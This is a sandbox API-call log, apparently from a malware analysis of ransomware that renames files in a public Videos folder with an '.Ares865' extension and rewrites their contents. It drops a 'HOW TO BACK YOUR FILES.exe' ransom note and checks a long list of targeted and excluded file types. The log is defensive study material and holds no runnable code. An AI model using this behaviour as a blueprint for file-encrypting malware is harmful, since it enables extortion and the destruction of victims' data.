[0039.691] lstrlenW (lpString="wmdb") returned 4 [0039.691] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.691] lstrlenW (lpString="wrk") returned 3 [0039.691] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.691] lstrlenW (lpString="xdb") returned 3 [0039.691] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.691] lstrlenW (lpString="xld") returned 3 [0039.691] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.691] lstrlenW (lpString="xmlff") returned 5 [0039.691] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.691] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Videos\\desktop.ini.Ares865") returned 42 [0039.691] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Videos\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\videos\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0039.785] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\videos\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x104 [0039.785] GetFileSizeEx (in: hFile=0x104, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=380) returned 1 [0039.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2e30020 [0039.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1d98 [0039.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0039.786] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0039.808] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0039.808] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0039.808] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x480, lpName=0x0) returned 0x114 [0039.809] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x190000 [0039.809] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0039.810] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0039.810] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0039.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1e10 [0039.810] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1e10 | out: hHeap=0x2b0000) returned 1 [0039.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2d1e10 [0039.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0039.810] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1e10 | out: hHeap=0x2b0000) returned 1 [0039.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0039.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cc760 [0039.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0039.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0039.811] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0039.811] CloseHandle (hObject=0x114) returned 1 [0039.811] CloseHandle (hObject=0x104) returned 1 [0039.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d98 | out: hHeap=0x2b0000) returned 1 [0039.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0039.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e30020 | out: hHeap=0x2b0000) returned 1 [0039.813] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x494f7340, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x494f7340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.813] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.813] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="aoldtz.exe") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2=".") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="..") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="windows") returned -1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="bootmgr") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="temp") returned -1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="pagefile.sys") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="boot") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="ids.txt") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="ntuser.dat") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="perflogs") returned 1 [0039.813] lstrcmpiW (lpString1="Sample Videos", lpString2="MSBuild") returned 1 [0039.813] lstrlenW (lpString="Sample Videos") returned 13 [0039.813] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34 [0039.813] lstrcpyW (in: lpString1=0x2cce42e, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0039.813] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos", dwFileAttributes=0x10) returned 1 [0039.813] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22e0 [0039.813] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2ed7f0 [0039.813] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d22e8 | out: ListHead=0x2e7710, ListEntry=0x2d22e8) returned 0x2e7c90 [0039.814] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0039.814] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0039.814] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d22e8 [0039.814] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Videos\\Sample Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0039.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed7f0 | out: hHeap=0x2b0000) returned 1 [0039.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0039.814] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos") returned 36 [0039.814] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0039.814] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.814] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Videos\\Sample Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\videos\\sample videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0039.814] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0039.815] GetLastError () returned 0x20 [0039.815] Sleep (dwMilliseconds=0xc8) [0040.040] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0040.040] GetLastError () returned 0x0 [0040.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.041] ReadFile (in: hFile=0x120, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.041] CloseHandle (hObject=0x120) returned 1 [0040.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.041] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.041] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x49569760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49569760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0a8 [0040.041] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.041] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.041] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.041] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x49569760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49569760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.041] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.041] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.041] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.041] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.041] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.041] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.042] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.042] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.042] lstrlenW (lpString="desktop.ini") returned 11 [0040.042] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\*") returned 38 [0040.042] lstrcpyW (in: lpString1=0x2cce44a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.042] lstrlenW (lpString="desktop.ini") returned 11 [0040.042] lstrlenW (lpString="Ares865") returned 7 [0040.042] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.042] lstrlenW (lpString=".dll") returned 4 [0040.042] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.042] lstrlenW (lpString=".lnk") returned 4 [0040.042] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.042] lstrlenW (lpString=".ini") returned 4 [0040.042] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.042] lstrlenW (lpString=".sys") returned 4 [0040.042] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.042] lstrlenW (lpString="desktop.ini") returned 11 [0040.042] lstrlenW (lpString="bak") returned 3 [0040.042] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.042] lstrlenW (lpString="ba_") returned 3 [0040.042] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.042] lstrlenW (lpString="dbb") returned 3 [0040.042] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.042] lstrlenW (lpString="vmdk") returned 4 [0040.042] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.042] lstrlenW (lpString="rar") returned 3 [0040.042] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.042] lstrlenW (lpString="zip") returned 3 [0040.042] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.042] lstrlenW (lpString="tgz") returned 3 [0040.042] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.042] lstrlenW (lpString="vbox") returned 4 [0040.042] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.042] lstrlenW (lpString="vdi") returned 3 [0040.042] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.042] lstrlenW (lpString="vhd") returned 3 [0040.042] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.042] lstrlenW (lpString="vhdx") returned 4 [0040.043] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.043] lstrlenW (lpString="avhd") returned 4 [0040.043] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.043] lstrlenW (lpString="db") returned 2 [0040.043] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.043] lstrlenW (lpString="db2") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.043] lstrlenW (lpString="db3") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.043] lstrlenW (lpString="dbf") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.043] lstrlenW (lpString="mdf") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.043] lstrlenW (lpString="mdb") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.043] lstrlenW (lpString="sql") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.043] lstrlenW (lpString="sqlite") returned 6 [0040.043] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.043] lstrlenW (lpString="sqlite3") returned 7 [0040.043] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.043] lstrlenW (lpString="sqlitedb") returned 8 [0040.043] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.043] lstrlenW (lpString="xml") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.043] lstrlenW (lpString="$er") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.043] lstrlenW (lpString="4dd") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.043] lstrlenW (lpString="4dl") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.043] lstrlenW (lpString="^^^") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.043] lstrlenW (lpString="abs") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.043] lstrlenW (lpString="abx") returned 3 [0040.043] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.044] lstrlenW (lpString="accdb") returned 5 [0040.044] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.044] lstrlenW (lpString="accdc") returned 5 [0040.044] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.044] lstrlenW (lpString="accde") returned 5 [0040.044] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.044] lstrlenW (lpString="accdr") returned 5 [0040.044] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.044] lstrlenW (lpString="accdt") returned 5 [0040.044] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.044] lstrlenW (lpString="accdw") returned 5 [0040.044] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.044] lstrlenW (lpString="accft") returned 5 [0040.044] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.044] lstrlenW (lpString="adb") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.044] lstrlenW (lpString="adb") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.044] lstrlenW (lpString="ade") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.044] lstrlenW (lpString="adf") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.044] lstrlenW (lpString="adn") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.044] lstrlenW (lpString="adp") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.044] lstrlenW (lpString="alf") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.044] lstrlenW (lpString="ask") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.044] lstrlenW (lpString="btr") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.044] lstrlenW (lpString="cat") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.044] lstrlenW (lpString="cdb") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.044] lstrlenW (lpString="ckp") returned 3 [0040.044] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.045] lstrlenW (lpString="cma") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.045] lstrlenW (lpString="cpd") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.045] lstrlenW (lpString="dacpac") returned 6 [0040.045] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.045] lstrlenW (lpString="dad") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.045] lstrlenW (lpString="dadiagrams") returned 10 [0040.045] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.045] lstrlenW (lpString="daschema") returned 8 [0040.045] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.045] lstrlenW (lpString="db-journal") returned 10 [0040.045] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.045] lstrlenW (lpString="db-shm") returned 6 [0040.045] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.045] lstrlenW (lpString="db-wal") returned 6 [0040.045] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.045] lstrlenW (lpString="dbc") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.045] lstrlenW (lpString="dbs") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.045] lstrlenW (lpString="dbt") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.045] lstrlenW (lpString="dbv") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.045] lstrlenW (lpString="dbx") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.045] lstrlenW (lpString="dcb") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.045] lstrlenW (lpString="dct") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.045] lstrlenW (lpString="dcx") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0040.045] lstrlenW (lpString="ddl") returned 3 [0040.045] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0040.045] lstrlenW (lpString="dlis") returned 4 [0040.045] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0040.045] lstrlenW (lpString="dp1") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0040.046] lstrlenW (lpString="dqy") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0040.046] lstrlenW (lpString="dsk") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0040.046] lstrlenW (lpString="dsn") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0040.046] lstrlenW (lpString="dtsx") returned 4 [0040.046] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0040.046] lstrlenW (lpString="dxl") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0040.046] lstrlenW (lpString="eco") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0040.046] lstrlenW (lpString="ecx") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0040.046] lstrlenW (lpString="edb") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0040.046] lstrlenW (lpString="epim") returned 4 [0040.046] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0040.046] lstrlenW (lpString="fcd") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0040.046] lstrlenW (lpString="fdb") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0040.046] lstrlenW (lpString="fic") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0040.046] lstrlenW (lpString="flexolibrary") returned 12 [0040.046] lstrlenW (lpString="fm5") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0040.046] lstrlenW (lpString="fmp") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0040.046] lstrlenW (lpString="fmp12") returned 5 [0040.046] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0040.046] lstrlenW (lpString="fmpsl") returned 5 [0040.046] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0040.046] lstrlenW (lpString="fol") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0040.046] lstrlenW (lpString="fp3") returned 3 [0040.046] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0040.047] lstrlenW (lpString="fp4") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0040.047] lstrlenW (lpString="fp5") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0040.047] lstrlenW (lpString="fp7") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0040.047] lstrlenW (lpString="fpt") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0040.047] lstrlenW (lpString="frm") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0040.047] lstrlenW (lpString="gdb") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.047] lstrlenW (lpString="gdb") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.047] lstrlenW (lpString="grdb") returned 4 [0040.047] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0040.047] lstrlenW (lpString="gwi") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0040.047] lstrlenW (lpString="hdb") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0040.047] lstrlenW (lpString="his") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0040.047] lstrlenW (lpString="ib") returned 2 [0040.047] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0040.047] lstrlenW (lpString="idb") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0040.047] lstrlenW (lpString="ihx") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0040.047] lstrlenW (lpString="itdb") returned 4 [0040.047] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0040.047] lstrlenW (lpString="itw") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0040.047] lstrlenW (lpString="jet") returned 3 [0040.047] 